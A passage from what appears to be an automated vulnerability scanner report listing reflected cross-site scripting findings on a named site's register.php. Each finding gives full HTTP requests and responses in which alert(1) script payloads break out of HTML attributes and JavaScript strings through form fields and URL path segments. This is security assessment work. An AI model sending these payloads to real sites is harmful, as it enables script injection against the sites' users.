The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3be8"><script>alert(1)</script>d49d0fefd8eae8548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /register.php/a3be8"><script>alert(1)</script>d49d0fefd8eae8548?buy=true&status=submit&fullName=&company=&position=&address=&zip=&country=-&phonecc=-&email=&promo=&usernm=&pass=&pass_conf=&captcha= HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 23:36:35 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 156537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/a3be8"><script>alert(1)</script>d49d0fefd8eae8548?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.43. https://hackalert.armorize.com/register.php [pass parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php

Issue detail

The value of the pass request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63694"><script>alert(1)</script>26f259216e0 was submitted in the pass parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

buy=true&status=submit&fullName=&company=&position=&address=&zip=&country=-&phonecc=-&email=&promo=&usernm=&pass=63694"><script>alert(1)</script>26f259216e0&pass_conf=&captcha=

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:50:11 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 156980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<input id="passInput" type="password" size="20" name="pass" value="63694"><script>alert(1)</script>26f259216e0" class="inputError" style="width:100px;" onFocus="document.getElementById('passLabel').className = 'labelHover'; this.className = 'inputHover'; doFx.setOpacity('inputPassIcon',1);" onBlur="document.ge
...[SNIP]...

2.44. https://hackalert.armorize.com/register.php [pass_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php

Issue detail

The value of the pass_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e2f0"><script>alert(1)</script>d553daa9606 was submitted in the pass_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register.php HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

buy=true&status=submit&fullName=&company=&position=&address=&zip=&country=-&phonecc=-&email=&promo=&usernm=&pass=&pass_conf=8e2f0"><script>alert(1)</script>d553daa9606&captcha=

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 22:01:20 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 156455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<input id="passConfInput" type="password" size="20" name="pass_conf" value="8e2f0"><script>alert(1)</script>d553daa9606" class="inputError" style="width:100px;" onFocus="document.getElementById('passConfLabel').className = 'labelHover'; this.className = 'inputHover'; doFx.setOpacity('inputPassConfIcon',1);" onBlur="doc
...[SNIP]...

2.45. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c152b%3balert(1)//5c04f315b79 was submitted in the REST URL parameter 2. This input was echoed as c152b;alert(1)//5c04f315b79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cc152b%3balert(1)//5c04f315b79/_css/styleorange.css HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:05:56 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<c152b;alert(1)//5c04f315b79/_css/styleorange.css?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.46. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67366"><script>alert(1)</script>0cdecdb0b1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/67366"><script>alert(1)</script>0cdecdb0b1f/_css/styleorange.css HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:14 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/67366"><script>alert(1)</script>0cdecdb0b1f/_css/styleorange.css?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.47. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc66"-alert(1)-"a68063b8cfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Cdbc66"-alert(1)-"a68063b8cfd/_css/styleorange.css HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:03:07 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<dbc66"-alert(1)-"a68063b8cfd/_css/styleorange.css?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.48. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe1a"-alert(1)-"a02149e3215 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css7fe1a"-alert(1)-"a02149e3215/styleorange.css HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:08:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_css7fe1a"-alert(1)-"a02149e3215/styleorange.css?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.49. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 782fa%3balert(1)//ad57a65c4bd was submitted in the REST URL parameter 3. This input was echoed as 782fa;alert(1)//ad57a65c4bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css782fa%3balert(1)//ad57a65c4bd/styleorange.css HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:10:02 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_css782fa;alert(1)//ad57a65c4bd/styleorange.css?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.50. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd2bf"-alert(1)-"ffb533c75d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.cssbd2bf"-alert(1)-"ffb533c75d8 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:05 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_css/styleorange.cssbd2bf"-alert(1)-"ffb533c75d8?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.51. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 82e26%3balert(1)//749e9e8db7b was submitted in the REST URL parameter 4. This input was echoed as 82e26;alert(1)//749e9e8db7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css82e26%3balert(1)//749e9e8db7b HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:16:07 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
</_css/styleorange.css82e26;alert(1)//749e9e8db7b?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.52. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 916ae%3balert(1)//8474c6649b6 was submitted in the REST URL parameter 2. This input was echoed as 916ae;alert(1)//8474c6649b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C916ae%3balert(1)//8474c6649b6/_js/ajaxInterface.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:13:59 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153956

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<916ae;alert(1)//8474c6649b6/_js/ajaxInterface.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.53. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a2ec"><script>alert(1)</script>e5103ddab74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /register.php/2a2ec"><script>alert(1)</script>e5103ddab74/_js/ajaxInterface.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:02:47 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<a href="/register.php/2a2ec"><script>alert(1)</script>e5103ddab74/_js/ajaxInterface.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

2.54. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e223b"-alert(1)-"2bdabef8849 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3Ce223b"-alert(1)-"2bdabef8849/_js/ajaxInterface.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:11:40 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...
<e223b"-alert(1)-"2bdabef8849/_js/ajaxInterface.js?status=setLanguage&languagecode=jp" style="color:#ffffff;">
...[SNIP]...

